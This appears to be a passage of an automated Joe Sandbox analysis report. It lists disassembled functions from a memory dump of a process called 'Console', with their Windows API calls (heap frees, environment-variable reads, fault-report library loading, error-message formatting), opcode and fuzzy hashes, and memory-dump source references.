                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap__aulldiv
                                                                                                                                                                                                                          • String ID: AMP Add: %llu => added=%llu total_added=%llu total_removed=%llu$AMP Budget: pressure=%llu ? budget=%llu (total_added=%llu, total_removed=%llu, mng_heap=%llu) pos=%d
                                                                                                                                                                                                                          • API String ID: 445004715-2332714957
                                                                                                                                                                                                                          • Opcode ID: 5801b0ccb94fc3a39787560ee7fda631ac6de4facc8acb3c190c324a6fd73be6
                                                                                                                                                                                                                          • Instruction ID: c9c3c36bd7a68dcf81e72b69f7157fac8710c79c4336030d9982ea85c65a2020
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5801b0ccb94fc3a39787560ee7fda631ac6de4facc8acb3c190c324a6fd73be6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64D15679A04301DFD724CF68C880B5EBBE5BB88714F04896DF98997398DB71A854CF82
                                                                                                                                                                                                                          Function 0122CB50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,00000000), ref: 0122CBD2
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0122CC00
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00000000), ref: 0122CD0A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$EnvironmentVariable
                                                                                                                                                                                                                          • String ID: COMPlus_
                                                                                                                                                                                                                          • API String ID: 2691138088-665472478
                                                                                                                                                                                                                          • Opcode ID: 1c00fe6d38b20f84bb4e0a8cb0f7e7450038a9d3b28f3a147c48792aaafbcf70
                                                                                                                                                                                                                          • Instruction ID: 557f2221d45f45172ae36e7cddff5985a88cc2f9a859cb0cb7231e2ce4390f91
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c00fe6d38b20f84bb4e0a8cb0f7e7450038a9d3b28f3a147c48792aaafbcf70
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64219CB1D10219AFDB10CF58D985BAEBBF8EB48324F10022EE815E3380E7B55A149BD1
                                                                                                                                                                                                                          Function 010117F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,00000000,?,?,01013FD2,7CAB6A82,?,?,?,?,?), ref: 010117FB
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(80000003,00000000,80000003,016371B8,?,?,?,?), ref: 01011872
                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 01011879
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CurrentExceptionFilterTerminateUnhandled
                                                                                                                                                                                                                          • String ID: StatusBreakpoint
                                                                                                                                                                                                                          • API String ID: 3985764695-3554155703
                                                                                                                                                                                                                          • Opcode ID: 9748d2a5c94e9dae76f6cf2c201b3ea5c91dc742e1d96f2b5d6df10e8fa3eec2
                                                                                                                                                                                                                          • Instruction ID: c5c9a720df03531ca737ee6076a6a72c0f71cad5d8c028470081753016fcfb7c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9748d2a5c94e9dae76f6cf2c201b3ea5c91dc742e1d96f2b5d6df10e8fa3eec2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3010430D001918BEB799A3D9C047723BD9AF01610F148289EE95A72DCDF38D811C7A1
                                                                                                                                                                                                                          Function 010108D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 0122CE91
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: GetLastError.KERNEL32 ref: 0122CE9F
                                                                                                                                                                                                                            • Part of subcall function 0122CD40: SetLastError.KERNEL32(00000000), ref: 0122CFD4
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReportFault), ref: 010108F7
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,01010A44,?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010915
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                                                                                                                                                          • String ID: FaultRep.dll$ReportFault
                                                                                                                                                                                                                          • API String ID: 1529210728-3658453154
                                                                                                                                                                                                                          • Opcode ID: eb010e7d9c7eb99773c7cb666297576c387c0babd71940810bca5f41a359a8a0
                                                                                                                                                                                                                          • Instruction ID: f8286cc77e6ce95e6744391d7e041b4cd932ff02c65e6779e7c95bf1f4cc2022
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb010e7d9c7eb99773c7cb666297576c387c0babd71940810bca5f41a359a8a0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F01F2367003145BEB205BAEEC94B2D7BDAEB85222F0500B9FA48E7358DA744C1587E2
                                                                                                                                                                                                                          Function 01097580 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43filestringCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,00000000,?), ref: 0109758C
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(Fatal error. ), ref: 01097596
                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,Fatal error. ,00007FFF,?,00000000,00000000), ref: 010975C5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHandleWritestrlen
                                                                                                                                                                                                                          • String ID: Fatal error.
                                                                                                                                                                                                                          • API String ID: 1058883207-2319153378
                                                                                                                                                                                                                          • Opcode ID: 63f9a725e7f2b90fa1bb0c33566d4778671ac383f942d23223ec5e9f6293b630
                                                                                                                                                                                                                          • Instruction ID: c595040c8a7dde4a4e4de4461685957611881b5e6e46c7005dac426fd35d2677
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63f9a725e7f2b90fa1bb0c33566d4778671ac383f942d23223ec5e9f6293b630
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F022B2A002556BEF7086AD9C8896A7AACCB80271B1002A4F909E32D0DF70C900CBA0
                                                                                                                                                                                                                          Function 012BC110 Relevance: 6.5, APIs: 5, Instructions: 293memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 012BC2C5
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BC355
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BC393
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BC43A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BC456
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 753f0b1b0f7d515c3ef8d7ab4a78a17cbc284eba5df2ee017fcdd9f68e873fb0
                                                                                                                                                                                                                          • Instruction ID: 277b85191485b0ca214f74c46e864dbff1db4c4875b07f1af9c5bcaa65a45357
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 753f0b1b0f7d515c3ef8d7ab4a78a17cbc284eba5df2ee017fcdd9f68e873fb0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03B17D71D102099FDF21DFA8D884BEEBBB8EF18344F54412AEA05FB251D730AA55CB90
                                                                                                                                                                                                                          Function 012C6340 Relevance: 6.5, APIs: 5, Instructions: 288memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 012C64EA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C657A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C65B8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C665B
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6677
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: b45130f4d3ddff54361b9a197710704a5e6eebc5c80d0b346805f2e59df5bfc5
                                                                                                                                                                                                                          • Instruction ID: 7b0727c691278d13d3aeb304baad3c03698ad594f125b13d8de48062718c4c9d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b45130f4d3ddff54361b9a197710704a5e6eebc5c80d0b346805f2e59df5bfc5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4B18071D102199FDB21CFA8D884BDEBBB8EF18744F14422EEA05A7341E734A955CB90
                                                                                                                                                                                                                          Function 01252A60 Relevance: 6.4, APIs: 5, Instructions: 146memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00FC2517,7CAB6A82,00000000,00000000,00000001,00000080,014ED7CE,000000FF,?,00FC2517,7CAB6A82), ref: 01252B37
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000001,00000080,014ED7CE,000000FF,?,00FC2517,7CAB6A82), ref: 01252B4D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000001,00000080,014ED7CE,000000FF,?,00FC2517,7CAB6A82), ref: 01252B63
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00FC2517,7CAB6A82,00000000,00000000,00000001,00000080,014ED7CE,000000FF,?,00FC2517,7CAB6A82), ref: 01252BA4
                                                                                                                                                                                                                            • Part of subcall function 01252C20: HeapFree.KERNEL32(00000000,00000000,00000000,7CAB6A82,00000000,00000000,8007000E), ref: 01252CBF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000001,00000080,014ED7CE,000000FF,?,00FC2517,7CAB6A82), ref: 01252BFA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 1da076826a9398ed0a5b7ce93902ed722bb078af104da257cd231fdf16200a72
                                                                                                                                                                                                                          • Instruction ID: afe4ad6e6cd060271f1c17f264e44467d1726c15f30b0b03924d1f41d33be8a7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1da076826a9398ed0a5b7ce93902ed722bb078af104da257cd231fdf16200a72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E517C74A10206DFDB25DF58D9C0BAABBB8FF05711F2441A9EE05AB295E731D910CBA0
                                                                                                                                                                                                                          Function 0125B290 Relevance: 6.3, APIs: 5, Instructions: 87memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0125B2E2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0125B30C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0125B336
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0125B360
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0125B390
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 4bdb916d8265f1b733886ca29ac684d4fd61689dbd99d4c90e9b82eb5ab030e0
                                                                                                                                                                                                                          • Instruction ID: 604b1edb9808df0f0d7a8d7992a464ddfb312f8311de1460fa61629fcf5c8550
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bdb916d8265f1b733886ca29ac684d4fd61689dbd99d4c90e9b82eb5ab030e0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9731B270910385EFEB61CF69CE88B99BFF8AB05710F248299ED45E77A1D3709A14CB11
                                                                                                                                                                                                                          Function 00FEB970 Relevance: 6.2, APIs: 4, Instructions: 247memorystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,?,00000000), ref: 00FEBB0A
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,?,00000000), ref: 00FEBC34
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 00FEBCEF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 00FEBD18
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82,00000002), ref: 00FCF12B
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82), ref: 00FCF197
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$strcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2606610500-0
                                                                                                                                                                                                                          • Opcode ID: 1092b6f96c4d6bde8b0e7321a4f00f33de6782389fa06ad11615d464bc95b7e4
                                                                                                                                                                                                                          • Instruction ID: d6708942c965d4fbb0a784a9f6a542ec0f695859c13ffc640d0d18b29a36f02e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1092b6f96c4d6bde8b0e7321a4f00f33de6782389fa06ad11615d464bc95b7e4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9B1CEB09012689BDB24CF25CC88BEEBBB4EF49314F1441D8E949AB291CB345F88DF55
                                                                                                                                                                                                                          Function 012258E0 Relevance: 6.2, APIs: 4, Instructions: 231windowCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00000002,?,7CAB6A82,00000000,?,00000000,0164A1AC,?,00000004,00000000,7CAB6A82,?,00000002,?,000000FF), ref: 01225A2D
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00000002,?,7CAB6A82,00000000,00000000,00000000,0164A1AC,7CAB6A82,?,00000002,?,000000FF,?,01219711,000010FF,00000000), ref: 01225ABA
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000,-00000002,00000004,00000000,?,00000002,?,000000FF,?,01219711,000010FF,00000000), ref: 01225B3E
                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000002,?,000000FF,?,01219711,000010FF,00000000), ref: 01225B65
                                                                                                                                                                                                                          Memory Dump Source
